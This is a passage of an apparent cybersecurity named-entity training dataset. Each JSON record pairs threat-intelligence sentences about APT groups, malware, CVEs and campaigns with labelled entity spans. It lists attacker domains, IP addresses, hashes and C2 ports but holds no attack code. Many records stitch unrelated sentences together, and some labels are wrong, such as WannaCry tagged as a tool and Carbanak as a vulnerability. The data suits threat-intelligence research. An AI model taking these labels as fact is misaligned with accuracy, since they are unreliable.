{"TOOL: Elirks backdoor": [[256, 271]], "VULNERABILITY: ProxyNotShell": [[459, 472]]}, "info": {"id": "cyberner_stix_train_001538", "source": "cyberner_stix_train"}} {"text": "TG-3390 : castle.blackcmd.com .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "DOMAIN: castle.blackcmd.com": [[10, 29]]}, "info": {"id": "cyberner_stix_train_001539", "source": "cyberner_stix_train"}} {"text": "In March 2016 , CTU researchers identified a spearphishing campaign using Bitly accounts to shorten malicious URLs .", "spans": {"ORGANIZATION: CTU": [[16, 19]], "TOOL: Bitly": [[74, 79]]}, "info": {"id": "cyberner_stix_train_001540", "source": "cyberner_stix_train"}} {"text": "The threat actors , observed by FireEye Labs , use a variety of different methods to either compromise or acquire already compromised payment card 
credentials , including sharing or purchasing dumps online , hacking vulnerable merchant websites and compromising payment card processing devices . In some other cases , LEAD gains access to a target by brute-forcing remote access login credentials , performing SQL injection , or exploiting unpatched web servers , and then they copy the Winnti installer directly to compromised machines .", "spans": {"THREAT_ACTOR: actors": [[11, 17]], "ORGANIZATION: FireEye Labs": [[32, 44]], "MALWARE: Winnti installer": [[487, 503]]}, "info": {"id": "cyberner_stix_train_001541", "source": "cyberner_stix_train"}} {"text": "Like many such groups , PLATINUM seeks to steal sensitive intellectual property related to government interests , but its range of preferred targets is consistently limited to specific governmental organizations , defense institutes , intelligence agencies , diplomatic institutions , and telecommunication providers in South and Southeast Asia . Unit 42 recently identified a targeted attack against an individual working for the Foreign Ministry of Uzbekistan in China .", "spans": {"THREAT_ACTOR: groups": [[15, 21]], "THREAT_ACTOR: PLATINUM": [[24, 32]], "ORGANIZATION: government": [[91, 101]], "ORGANIZATION: governmental organizations": [[185, 211]], "ORGANIZATION: defense institutes": [[214, 232]], "ORGANIZATION: intelligence agencies": [[235, 256]], "ORGANIZATION: diplomatic institutions": [[259, 282]], "ORGANIZATION: telecommunication providers": [[289, 316]], "ORGANIZATION: Unit 42": [[347, 354]], "ORGANIZATION: Foreign Ministry": [[431, 447]]}, "info": {"id": "cyberner_stix_train_001542", "source": "cyberner_stix_train"}} {"text": "When root privilege is gained , a shell backdoor and malicious RCSAndroid agent APK file will be installed The second method is to use a stealthy backdoor app such as ANDROIDOS_HTBENEWS.A , which was designed to bypass Google Play . 
While FIN7 has embedded VBE as OLE objects for over a year , they continue to update their script launching mechanisms . . A careful analysis of the domain registrations from this threat actor between 2014 and 2015 allowed us to identify one profile used to register several domains that were used as C&C servers for a particular malware family employed by the Winnti group .", "spans": {"MALWARE: RCSAndroid": [[63, 73]], "MALWARE: ANDROIDOS_HTBENEWS.A": [[167, 187]], "SYSTEM: Google Play": [[219, 230]], "THREAT_ACTOR: FIN7": [[239, 243]], "TOOL: VBE": [[257, 260]]}, "info": {"id": "cyberner_stix_train_001543", "source": "cyberner_stix_train"}} {"text": "0c458dfe0a2a01ab300c857fdc3373b75fbb8ccfa23d16eff0d6ab888a1a28f6", "spans": {"FILEPATH: 0c458dfe0a2a01ab300c857fdc3373b75fbb8ccfa23d16eff0d6ab888a1a28f6": [[0, 64]]}, "info": {"id": "cyberner_stix_train_001544", "source": "cyberner_stix_train"}} {"text": "This way , the malware can have its configuration , malicious binaries and file listings updated , but can also download and execute other binaries . Confucius' backdoors are delivered through Office documents exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 .", "spans": {"MALWARE: malware": [[15, 22]], "MALWARE: Confucius' backdoors": [[150, 170]], "VULNERABILITY: CVE-2015-1641": [[255, 268]], "VULNERABILITY: CVE-2017-11882": [[273, 287]]}, "info": {"id": "cyberner_stix_train_001545", "source": "cyberner_stix_train"}} {"text": "The malicious apps can steal personally identifiable and financial data and install additional apps . First attack of this campaign took place in May 2018 . 
The “ wprgxyeqd79.exe ” sample actually is a Self Extracting Archive ( SFX S-TOOL/SFA ) containing four files designed to be extracted in the %TEMP% folder .", "spans": {"FILEPATH: wprgxyeqd79.exe": [[163, 178]], "TOOL: Self Extracting Archive": [[202, 225]], "TOOL: SFX S-TOOL/SFA": [[228, 242]]}, "info": {"id": "cyberner_stix_train_001546", "source": "cyberner_stix_train"}} {"text": "However , based upon the timeframe of subsequent telemetry we observe , we understand the attack chain as follows :", "spans": {}, "info": {"id": "cyberner_stix_train_001547", "source": "cyberner_stix_train"}} {"text": "The similarity to common spam may however also serve a more devious purpose .", "spans": {}, "info": {"id": "cyberner_stix_train_001548", "source": "cyberner_stix_train"}} {"text": "We see that this file drops 2 additional files : netwf.bat and netwf.dll .", "spans": {"FILEPATH: netwf.bat": [[49, 58]], "FILEPATH: netwf.dll": [[63, 72]]}, "info": {"id": "cyberner_stix_train_001549", "source": "cyberner_stix_train"}} {"text": "Then , it will add the result of the public method localDate.getTime ( ) , which simply gets the current date . TG-3390 's activities indicate a preference for leveraging SWCs and scan-and-exploit techniques to compromise target systems . Data about Wingbird activity indicates that it is typically used to attack individuals and individual computers instead of networks .", "spans": {}, "info": {"id": "cyberner_stix_train_001550", "source": "cyberner_stix_train"}} {"text": "MALWARE TECHNICAL DETAILS During our investigation , researchers uncovered a malware known as \" Gustuff. '' . In order to gain any further credentials , APT10 will usually deploy credential theft tools such as mimikatz or PwDump , sometimes using DLL load order hijacking , to use against a domain controller , explained further in Annex B . 
ASUS Live Update is an utility that is pre-installed on most ASUS computers and is used to automatically update certain components such as BIOS , UEFI , drivers and applications . The contents found in secure[.]66[.]to often lead to zhu[.]vn , which is Hack520 ’s domain for hosting his own private blog .", "spans": {"MALWARE: Gustuff.": [[96, 104]], "THREAT_ACTOR: APT10": [[153, 158]], "TOOL: mimikatz": [[210, 218]], "TOOL: PwDump": [[222, 228]], "TOOL: DLL load order hijacking": [[247, 271]], "TOOL: ASUS Live Update": [[342, 358]], "ORGANIZATION: ASUS": [[403, 407]], "TOOL: BIOS": [[481, 485]], "TOOL: UEFI": [[488, 492]], "TOOL: drivers": [[495, 502]], "TOOL: applications": [[507, 519]]}, "info": {"id": "cyberner_stix_train_001551", "source": "cyberner_stix_train"}} {"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . The zero-day vulnerability found and reported by Symantec CVE-2019-0703 occurs due to the ACT the Windows SMB Server handles certain requests .", "spans": {"MALWARE: files": [[4, 9]], "VULNERABILITY: Microsoft Office vulnerability": [[33, 63]], "VULNERABILITY: CVE-2012-0158": [[66, 79]], "VULNERABILITY: zero-day": [[163, 171]], "ORGANIZATION: Symantec": [[208, 216]], "VULNERABILITY: CVE-2019-0703": [[217, 230]], "SYSTEM: Windows": [[257, 264]]}, "info": {"id": "cyberner_stix_train_001552", "source": "cyberner_stix_train"}} {"text": "This script relays commands and output between the controller and the system . 
Buhtrap is the first hacker group using a network worm to infect the overall bank infrastructure that significantly increases the difficulty of removing all malicious functions from the network .", "spans": {"THREAT_ACTOR: Buhtrap": [[79, 86]], "ORGANIZATION: bank": [[156, 160]]}, "info": {"id": "cyberner_stix_train_001553", "source": "cyberner_stix_train"}} {"text": "\" Accessing these devices and their sensitive data creates a new and steady stream of revenue for cybercriminals , '' Check Point researchers wrote in a recently published report . We determined that these backdoors were installed on the targets ' machines on September 19 2018 , based mainly on the service creation time of the loader component . APT33 : 8.26.21.117 srvhost.servehttp.com . The login , as mentioned above , was also designed to look legitimate .", "spans": {"THREAT_ACTOR: APT33": [[348, 353]], "IP_ADDRESS: 8.26.21.117": [[356, 367]], "DOMAIN: srvhost.servehttp.com": [[368, 389]]}, "info": {"id": "cyberner_stix_train_001554", "source": "cyberner_stix_train"}} {"text": "The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell . Thrip was attempting to remotely install a previously unknown piece of malware ( Infostealer.Catchamas ) on computers within the victim 's network .", "spans": {"TOOL: python script": [[63, 76]], "VULNERABILITY: CVE-2017-0144": [[132, 145]], "MALWARE: errr.aspx": [[194, 203]], "MALWARE: Infostealer.Catchamas": [[296, 317]]}, "info": {"id": "cyberner_stix_train_001555", "source": "cyberner_stix_train"}} {"text": "The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio . 
Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant .", "spans": {"MALWARE: Android version": [[4, 19]], "FILEPATH: Honeycomb": [[122, 131]], "TOOL: C2": [[301, 303]]}, "info": {"id": "cyberner_stix_train_001556", "source": "cyberner_stix_train"}} {"text": "Agent Smith : A New Species of Mobile Malware July 10 , 2019 Check Point Researchers recently discovered a new variant of mobile malware that quietly infected around 25 million devices , while the user remains completely unaware . The self-extracting RAR writes a legitimate executable , an actor-created DLL called Loader.dll and a file named readme.txt to the filesystem and then executes the legitimate executable . Again , the attacker ’s intention appeared to be espionage . “ Unlike other FinFisher customers or users who focus mostly on domestic operations , BlackOasis focuses on external operations and go after a wide range of targets around the world , ” explained Costin Raiu , director of the global research and analysis team at Kaspersky Lab . 
GoldenSpy has used HTTP over ports 9005 and 9006 for network traffic , 9002 for C2 requests , 33666 as a WebSocket , and 8090 to download files.[15 ] GravityRAT has used HTTP over a non - standard port , such as TCP port 46769.[16 ] HARDRAIN binds and listens on port 443 with a FakeTLS method.[17 ] HOPLIGHT has connected outbound over TCP port 443 with a FakeTLS method.[18 ] Some Lazarus Group malware uses a list of ordered port numbers to choose a port for C2 traffic , creating port - protocol mismatches.[19][20 ] MacMa has used TCP port 5633 for C2 Communication.[21 ]", "spans": {"MALWARE: Agent Smith": [[0, 11]], "ORGANIZATION: Check Point": [[61, 72]], "TOOL: self-extracting RAR": [[235, 254]], "MALWARE: Loader.dll": [[316, 326]], "MALWARE: readme.txt": [[344, 354]], "THREAT_ACTOR: FinFisher": [[495, 504]], "THREAT_ACTOR: BlackOasis": [[566, 576]], "ORGANIZATION: Kaspersky Lab": [[743, 756]], "MALWARE: GoldenSpy": [[759, 768]], "MALWARE: GravityRAT": [[909, 919]], "MALWARE: HARDRAIN": [[992, 1000]], "MALWARE: HOPLIGHT": [[1059, 1067]], "MALWARE: Lazarus Group malware": [[1142, 1163]], "MALWARE: MacMa": [[1280, 1285]], "SYSTEM: C2 Communication.[21": [[1313, 1333]]}, "info": {"id": "cyberner_stix_train_001557", "source": "cyberner_stix_train"}} {"text": "This special exception handler is needed to manage some memory buffers protection and special exceptions that are used to provide more stealthy execution . A case of these obscure lines can be found in a blogpost published in coordination and parallel to this report - \" Flying Kitten to Rocket Kitten , A Case of Ambiguity and Shared Code \" 3 by Collin Anderson and Claudio Guarnieri . Upon execution , the launcher will attempt to hook legitimate wininet.dll library by overwriting its entry point in memory with the address of a malicious routine . 
During the course of researching the Winnti group , we came across previously unreported malware samples that we attributed to the group based on the malware arsenal and the use of registered domains as attack infrastructure .", "spans": {"THREAT_ACTOR: Flying Kitten": [[271, 284]], "THREAT_ACTOR: Rocket Kitten": [[288, 301]], "FILEPATH: wininet.dll": [[449, 460]], "THREAT_ACTOR: Winnti group": [[589, 601]], "MALWARE: previously unreported malware samples": [[619, 656]], "MALWARE: malware arsenal": [[702, 717]], "SYSTEM: registered domains": [[733, 751]]}, "info": {"id": "cyberner_stix_train_001558", "source": "cyberner_stix_train"}} {"text": "For example , the Android malware that both deploy share the same strings of code for their decoding algorithm . Another set of attacks called Operation Erebus leverages another Flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation . According to the website , that domain supposedly belongs to a legitimate security company “ fully owned by the Russian Government ” ( sic . ) and having offices in “ Moscow , Saint Petersburg and Yekaterinburg ” , but the address says the company is located in Trump Tower , in New York . 
For Greatness specifically , anyone implementing multi - factor authentication should opt for code - based authentication through their MFA app of choice , such as Cisco Duo , rather than the easier - to - break method of a simple “ yes ” or “ no ” push notification .", "spans": {"SYSTEM: Android": [[18, 25]], "VULNERABILITY: Flash exploit": [[178, 191]], "VULNERABILITY: CVE-2016-4117": [[194, 207]], "ORGANIZATION: Russian Government": [[386, 404]], "ORGANIZATION: Trump Tower": [[536, 547]], "SYSTEM: Cisco Duo": [[728, 737]]}, "info": {"id": "cyberner_stix_train_001559", "source": "cyberner_stix_train"}} {"text": "In addition to modules , CozyDuke can also be instructed to download and execute other , independent executables .", "spans": {"MALWARE: CozyDuke": [[25, 33]]}, "info": {"id": "cyberner_stix_train_001560", "source": "cyberner_stix_train"}} {"text": "According to our research , TrickMo is still under active development as we expect to see frequent changes and updates . These findings also suggest that the threat groups have robust exploit developing capabilities because CVE-2018-0798 is not widely reported on and it is typically not incorporated into publicly available weaponizers . 
The attacks delivered a PowerShell backdoor called QUADAGENT , a tool attributed to the OilRig group by both ClearSky Cyber Security and FireEye .", "spans": {"MALWARE: TrickMo": [[28, 35]], "THREAT_ACTOR: threat groups": [[158, 171]], "VULNERABILITY: CVE-2018-0798": [[224, 237]], "MALWARE: PowerShell backdoor": [[363, 382]], "MALWARE: QUADAGENT": [[390, 399]], "THREAT_ACTOR: OilRig group": [[427, 439]], "ORGANIZATION: ClearSky Cyber Security": [[448, 471]], "ORGANIZATION: FireEye": [[476, 483]]}, "info": {"id": "cyberner_stix_train_001561", "source": "cyberner_stix_train"}} {"text": "Comparing this development to their previous attacks , we think Outlaw may be aiming to go after enterprises that have yet to update their systems , assessing security and changes with their previously infected hosts , finding new and old targets , and possibly testing their updates in the wild .", "spans": {"THREAT_ACTOR: Outlaw": [[64, 70]]}, "info": {"id": "cyberner_stix_train_001562", "source": "cyberner_stix_train"}} {"text": "This might allow a second attacker to install code of their choice – for example , their own Quasar RAT – on the original attacker ’s server .", "spans": {"MALWARE: Quasar RAT": [[93, 103]]}, "info": {"id": "cyberner_stix_train_001563", "source": "cyberner_stix_train"}} {"text": "Please see the IOCs section for all app and package name combinations . FireEye Threat Intelligence assesses with high confidence that APT41 carries out an array of financially motivated intrusions , particularly against the video game industry , including stealing source code and digital certificates , virtual currency manipulation , and attempting to deploy ransomware . 
These URIs result in the download of an installer , which creates a PE of the malware typically known as HTTPBrowser , but called Token Control by the Wekby group themselves ( based upon the PDB strings found within many of the samples ) .", "spans": {"ORGANIZATION: FireEye": [[72, 79]], "THREAT_ACTOR: APT41": [[135, 140]], "ORGANIZATION: video game industry": [[225, 244]], "MALWARE: HTTPBrowser": [[480, 491]], "MALWARE: Token Control": [[505, 518]], "THREAT_ACTOR: Wekby group": [[526, 537]], "TOOL: PDB": [[566, 569]]}, "info": {"id": "cyberner_stix_train_001564", "source": "cyberner_stix_train"}} {"text": "What it does The surveillance functionality of Desert Scorpion resides in a second stage payload that can only be downloaded if the victim has downloaded , installed , and interacted with the first-stage chat application . Today we'd like to share some of our findings , and add something new to what 's currently common knowledge about Lazarus Group activities , and their connection to the much talked about February 2016 incident , when an unknown attacker attempted to steal up to $851M USD from Bangladesh Central Bank . SHIPPING_MX00034900_PL_INV_pdf.zip : 9474e1517c98d4165300a49612888d16643efbf6 . 
CrowdStrike incident responders found that renamed Plink and AnyDesk executable creation timestamps on affected backend Exchange servers were closely correlated with PowerShell execution events in the Remote PowerShell logs , indicating the threat actor leveraged the newly discovered exploit chain to drop other tooling for persistent access to the affected Exchange servers .", "spans": {"MALWARE: Desert Scorpion": [[47, 62]], "THREAT_ACTOR: attacker": [[451, 459]], "ORGANIZATION: Bangladesh Central Bank": [[500, 523]], "FILEPATH: SHIPPING_MX00034900_PL_INV_pdf.zip": [[526, 560]], "FILEPATH: 9474e1517c98d4165300a49612888d16643efbf6": [[563, 603]]}, "info": {"id": "cyberner_stix_train_001565", "source": "cyberner_stix_train"}} {"text": "Downeks uses third party websites to determine the external IP of the victim machine , possibly to determine victim location with GeoIP .", "spans": {"MALWARE: Downeks": [[0, 7]], "TOOL: third party websites": [[13, 33]], "TOOL: GeoIP": [[130, 135]]}, "info": {"id": "cyberner_stix_train_001566", "source": "cyberner_stix_train"}} {"text": "In addition , the credit card grabber target list was expanded with Snapchat and Viber . APT10 actors then compressed proprietary data from Visma using WinRAR (deployed by the attackers) and exfiltrated to a Dropbox account using the cURL for Windows command-line tool . 
The group is known to use custom malware called Daserf , but also employs multiple commodity and custom tools , exploit vulnerabilities , and use social engineering techniques .", "spans": {"SYSTEM: Snapchat": [[68, 76]], "SYSTEM: Viber": [[81, 86]], "THREAT_ACTOR: APT10": [[89, 94]], "TOOL: WinRAR": [[152, 158]], "TOOL: cURL": [[234, 238]], "MALWARE: Daserf": [[319, 325]], "TOOL: multiple commodity": [[345, 363]], "TOOL: custom tools": [[368, 380]], "VULNERABILITY: vulnerabilities": [[391, 406]], "TOOL: social engineering techniques": [[417, 446]]}, "info": {"id": "cyberner_stix_train_001567", "source": "cyberner_stix_train"}} {"text": "Change archive command After this activation cycle , the malware will start the collection of information activities and dissemination . The MuddyWater campaign was first sighted in 2017 when it targeted the Saudi government using an attack involving PowerShell scripts deployed via Microsoft Office Word macro . It then begins to beacon to a configured domain of connect.bafunpda.xyz on TCP port 8081 . There are currently five behavioral - based rules defined by Apple .", "spans": {"ORGANIZATION: government": [[214, 224]], "TOOL: PowerShell scripts": [[251, 269]], "TOOL: Microsoft": [[283, 292]], "TOOL: Office Word": [[293, 304]], "DOMAIN: connect.bafunpda.xyz": [[364, 384]], "ORGANIZATION: Apple": [[465, 470]]}, "info": {"id": "cyberner_stix_train_001568", "source": "cyberner_stix_train"}} {"text": "The Magic Hound campaign used Word and Excel documents containing malicious macros as a delivery method , specifically attempting to load MagicHound.Rollover . 
The malware is not obfuscated so we easily found interesting strings here .", "spans": {"TOOL: MagicHound.Rollover": [[138, 157]], "MALWARE: malware": [[164, 171]]}, "info": {"id": "cyberner_stix_train_001569", "source": "cyberner_stix_train"}} {"text": "While we now know that CozyDuke had been under development since at least the end of 2011 , it was not until the early days of July 2014 that the first large-scale CozyDuke campaign that we are aware of took place .", "spans": {"MALWARE: CozyDuke": [[23, 31], [164, 172]]}, "info": {"id": "cyberner_stix_train_001570", "source": "cyberner_stix_train"}} {"text": "] cashnow [ . Our investigations revealed that the attackers drove around several cities in Russia , stealing money from ATMs belonging to different banks . If the immediate value for block comparison variable is not found in the flattened blocks , Threat intelligence is simply information about threats .", "spans": {"THREAT_ACTOR: attackers": [[51, 60]], "ORGANIZATION: banks": [[149, 154]], "ORGANIZATION: Threat intelligence": [[249, 268]]}, "info": {"id": "cyberner_stix_train_001571", "source": "cyberner_stix_train"}} {"text": "Publicly available Bitly data reveals how many of the short links were clicked , likely by a victim opening a spearphishing email and clicking the link to the fake Gmail login page .", "spans": {"TOOL: Bitly": [[19, 24]], "TOOL: email": [[124, 129]], "TOOL: Gmail": [[164, 169]]}, "info": {"id": "cyberner_stix_train_001572", "source": "cyberner_stix_train"}} {"text": "The fake website hosting server for the UnionCryptoTrader case will be described next .", "spans": {"TOOL: UnionCryptoTrader": [[40, 57]]}, "info": {"id": "cyberner_stix_train_001573", "source": "cyberner_stix_train"}} {"text": "Given the DroidVPN look and feel being used by this variant of HenBox , it ’ s highly likely the uyghurapps [ . They are a very , very persistent group , ” says Costin Raiu , who has been watching Winnti since 2011 . 
With this in mind , this week we are providing some indicators for a China based adversary who we crypt as \" NUMBERED PANDA \" Numbered Panda has a long list of high-profile victims and is known by a number of names including : DYNCALC , IXESHE , JOY RAT , APT-12 , etc .", "spans": {"MALWARE: HenBox": [[63, 69]], "ORGANIZATION: Costin Raiu": [[161, 172]], "THREAT_ACTOR: Winnti": [[197, 203]], "THREAT_ACTOR: NUMBERED PANDA": [[326, 340]], "THREAT_ACTOR: Numbered Panda": [[343, 357]], "THREAT_ACTOR: DYNCALC": [[444, 451]], "THREAT_ACTOR: IXESHE": [[454, 460]], "THREAT_ACTOR: JOY RAT": [[463, 470]], "THREAT_ACTOR: APT-12": [[473, 479]]}, "info": {"id": "cyberner_stix_train_001574", "source": "cyberner_stix_train"}} {"text": "Leveraging this feature , the malware developer can root the device using a range of vulnerabilities , well-known or zero-day . Group-IB specialists tracked a massive mailout of emails containing a malicious Microsoft Word attachment titled Договор.doc” [Contract.doc] . In several cases , the Cobalt compromised company infrastructure and employee accounts in order to send phishing messages to partner companies in North and South America , Europe , CIS countries , and Central and Southeast Asia .", "spans": {"ORGANIZATION: Group-IB": [[128, 136]], "MALWARE: malicious Microsoft Word attachment": [[198, 233]], "THREAT_ACTOR: Cobalt": [[294, 300]]}, "info": {"id": "cyberner_stix_train_001575", "source": "cyberner_stix_train"}} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . 
Venomous Bear has deployed malware to targets using several novel methods .", "spans": {"VULNERABILITY: Carbanak": [[20, 28]], "THREAT_ACTOR: criminals": [[95, 104]], "ORGANIZATION: financial industry": [[145, 163]], "THREAT_ACTOR: Venomous Bear": [[199, 212]]}, "info": {"id": "cyberner_stix_train_001576", "source": "cyberner_stix_train"}} {"text": "From our trend analysis seen in Figure 3 , Locky ransomware started being delivered via DOCM format email attachments more extensively beginning in August . To obtain logins and passwords they applied keyloggers built into Corkow , as well as a commonly used feature of Mimikatz , dumping clear text Windows credentials from LSA .", "spans": {"MALWARE: Locky": [[43, 48]], "MALWARE: keyloggers": [[201, 211]], "MALWARE: Corkow": [[223, 229]], "SYSTEM: Windows": [[300, 307]]}, "info": {"id": "cyberner_stix_train_001577", "source": "cyberner_stix_train"}} {"text": "FakeSpy first targeted South Korean and Japanese speakers . NewsBeef attacks against Saudi Arabian organizations and individuals (as well as targets in the European Union) are likely to continue . There are no obvious links between the Eastern European and Middle Eastern targets , but it is clear that Gallmaker is specifically targeting the defense , military , and government sectors .", "spans": {"MALWARE: FakeSpy": [[0, 7]], "THREAT_ACTOR: NewsBeef": [[60, 68]], "THREAT_ACTOR: Gallmaker": [[303, 312]], "ORGANIZATION: defense": [[343, 350]], "ORGANIZATION: military": [[353, 361]], "ORGANIZATION: government sectors": [[368, 386]]}, "info": {"id": "cyberner_stix_train_001578", "source": "cyberner_stix_train"}} {"text": "Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor . 
After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft ’s Equation Editor ( EQNEDT32 ) .", "spans": {"MALWARE: Bemstour": [[0, 8]], "TOOL: DoublePulsar backdoor": [[62, 83]], "FILEPATH: RTF files": [[138, 147]], "VULNERABILITY: CVE-2018-0798": [[168, 181]], "ORGANIZATION: Microsoft": [[199, 208]], "TOOL: Equation Editor": [[212, 227]], "TOOL: EQNEDT32": [[230, 238]]}, "info": {"id": "cyberner_stix_train_001579", "source": "cyberner_stix_train"}} {"text": "Dynamic overlays When victims open up a targeted app , Marcher smoothly displays an overlay , a customized WebView , looks in its application preferences ( main_prefs.xml ) and decides which specified URL is needed for the targeted app . From early June , when the cyber-attack on the Japan Pension Service started to be reported widely , various Japanese organizations would have started to deploy protection measures . Adobe issued a fix Monday to its users in the form of a software update . For example , Registry keys and other configuration settings can be used to modify protocol and port pairings.[3 ] APT - C-36 has used port 4050 for C2 communications.[4 ]", "spans": {"MALWARE: Marcher": [[55, 62]], "ORGANIZATION: Pension Service": [[291, 306]], "ORGANIZATION: Adobe": [[421, 426]], "THREAT_ACTOR: APT - C-36": [[610, 620]]}, "info": {"id": "cyberner_stix_train_001580", "source": "cyberner_stix_train"}} {"text": "Local and Remote Shells In order to execute commands on the infected devices , as well as to provide a reverse shell to the Command & Control operators , Exodus Two immediately attempts to execute a payload it downloads with the name null . Suckfly 's attacks on government organizations that provide information technology services to other government branches is not limited to India . 
The letter ends with “ Death to Israel ” and “ Humiliation and shame to the tyrant America ” 65c8b9e9017ac84d90553a252c836c38b6a3902e5ab24d3a4b8a584e2d615fcc . This is just another example of how these groups can now quickly develop their own ransomware variants by standing on the shoulders of those criminals who had their previous work exposed publicly .", "spans": {"MALWARE: Exodus Two": [[154, 164]], "ORGANIZATION: government organizations": [[263, 287]], "ORGANIZATION: information technology services": [[301, 332]], "ORGANIZATION: government": [[342, 352]], "FILEPATH: 65c8b9e9017ac84d90553a252c836c38b6a3902e5ab24d3a4b8a584e2d615fcc": [[481, 545]], "VULNERABILITY: previous work exposed publicly": [[713, 743]]}, "info": {"id": "cyberner_stix_train_001581", "source": "cyberner_stix_train"}} {"text": "The email contains a Microsoft Office document as an attachment .", "spans": {"TOOL: email": [[4, 9]], "TOOL: Microsoft Office": [[21, 37]]}, "info": {"id": "cyberner_stix_train_001582", "source": "cyberner_stix_train"}} {"text": "YouTube channel of the malicious developer His YouTube channel provided us with another valuable piece of information : he himself features in a video tutorial for one of his other projects . Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . Filename: Pyongyang Directory Group email April 2017.RC_Office_Coordination_Associate.scr .", "spans": {"SYSTEM: YouTube": [[0, 7], [47, 54]], "MALWARE: Pony DLL": [[281, 289]], "MALWARE: Vawtrak": [[294, 301]], "FILEPATH: Pyongyang Directory Group email April 2017.RC_Office_Coordination_Associate.scr": [[401, 480]]}, "info": {"id": "cyberner_stix_train_001583", "source": "cyberner_stix_train"}} {"text": "A Google authorization token is a way to access the Google account and the related services of a user . 
BRONZE BUTLER has used a broad range of publicly available ( Mimikatz and gsecdump ) and proprietary ( Daserf and Datper ) tools . The added code requires that the mblock_t pointer information is passed from the argument of optinsn_t : :f unc to trace back previous instructions using the mblock_t linked list . Table 1 : Malicious OT files Filename Hash Purpose a.iso Unknown Contains attacker ’s files lun.vbs 26e2a41f26ab885bf409982cb823ffd1", "spans": {"ORGANIZATION: Google": [[2, 8], [52, 58]], "THREAT_ACTOR: BRONZE BUTLER": [[104, 117]], "TOOL: Mimikatz": [[165, 173]], "TOOL: gsecdump": [[178, 186]], "TOOL: Daserf": [[207, 213]], "TOOL: Datper": [[218, 224]], "TOOL: mblock_t": [[268, 276], [393, 401]], "TOOL: optinsn_t : :f unc": [[328, 346]]}, "info": {"id": "cyberner_stix_train_001584", "source": "cyberner_stix_train"}} {"text": "Top 20 countries targeted by Hummingbad/Shedun . We concluded that Lazarus Group was responsible for WannaCry , a destructive attack in May that targeted Microsoft customers . APT33 : 8.26.21.222 mynetwork.ddns.net . 
If implemented correctly , PIEHOP can connect to a user supplied remote MSSQL server for uploading LIGHTWORK and issuing remote commands specifically targeting RTU , and then delete itself .", "spans": {"MALWARE: Hummingbad/Shedun": [[29, 46]], "THREAT_ACTOR: Lazarus Group": [[67, 80]], "TOOL: WannaCry": [[101, 109]], "ORGANIZATION: Microsoft customers": [[154, 173]], "THREAT_ACTOR: APT33": [[176, 181]], "IP_ADDRESS: 8.26.21.222": [[184, 195]], "DOMAIN: mynetwork.ddns.net": [[196, 214]], "TOOL: PIEHOP": [[244, 250]], "MALWARE: LIGHTWORK": [[316, 325]]}, "info": {"id": "cyberner_stix_train_001585", "source": "cyberner_stix_train"}} {"text": "However , there is a need for broader focus across IoT in general , both from security teams at organizations that need to be more aware of these types of threats , as well as from IoT device makers who need to provide better enterprise support and monitoring capabilities to make it easier for security teams to defend their networks .", "spans": {"TOOL: IoT": [[51, 54], [181, 184]]}, "info": {"id": "cyberner_stix_train_001586", "source": "cyberner_stix_train"}} {"text": "As we did not identify a pattern in the order which the commands are invoked , we believe the operators are executing them manually .", "spans": {}, "info": {"id": "cyberner_stix_train_001587", "source": "cyberner_stix_train"}} {"text": "The authors of the malware didn’t appear to have spent any effort in concealing indicators or obfuscating code – the IP address with which it tries to communicate is hardcoded in clear-text inside the binary .", "spans": {}, "info": {"id": "cyberner_stix_train_001588", "source": "cyberner_stix_train"}} {"text": "UPDATE – download APK file from C & C and install it . In the first week of May 2016 , FireEye 's DTI identified a wave of emails containing malicious attachments being sent to multiple banks in the Middle East region . 
During our investigation , there was a breakthrough discovery that helped connect Leafminer to a number of attacks observed on systems in the Middle East and identify the toolkit used in the group 's efforts of intrusion , lateral movement , and Exfiltration .", "spans": {"ORGANIZATION: FireEye 's DTI": [[87, 101]], "MALWARE: malicious attachments": [[141, 162]], "ORGANIZATION: banks": [[186, 191]], "THREAT_ACTOR: Leafminer": [[302, 311]]}, "info": {"id": "cyberner_stix_train_001589", "source": "cyberner_stix_train"}} {"text": "Captured credentials are DES encrypted using the password \" 12345678 \" and are written to the log.txt file in the root directory .", "spans": {}, "info": {"id": "cyberner_stix_train_001590", "source": "cyberner_stix_train"}} {"text": "The UnionCryptoTrader Windows version has the following window showing a price chart for several cryptocurrency exchanges .", "spans": {"TOOL: UnionCryptoTrader": [[4, 21]], "SYSTEM: Windows": [[22, 29]], "SYSTEM: window": [[56, 62]]}, "info": {"id": "cyberner_stix_train_001591", "source": "cyberner_stix_train"}} {"text": "While cmd.exe is a console application , it still requires GUI like functionality and other support to interact with the operating system .", "spans": {"FILEPATH: cmd.exe": [[6, 13]], "TOOL: GUI": [[59, 62]]}, "info": {"id": "cyberner_stix_train_001592", "source": "cyberner_stix_train"}} {"text": "Kaspersky first became aware of BlackOasis’ activities in May 2016 , while investigating another Adobe Flash zero day . 
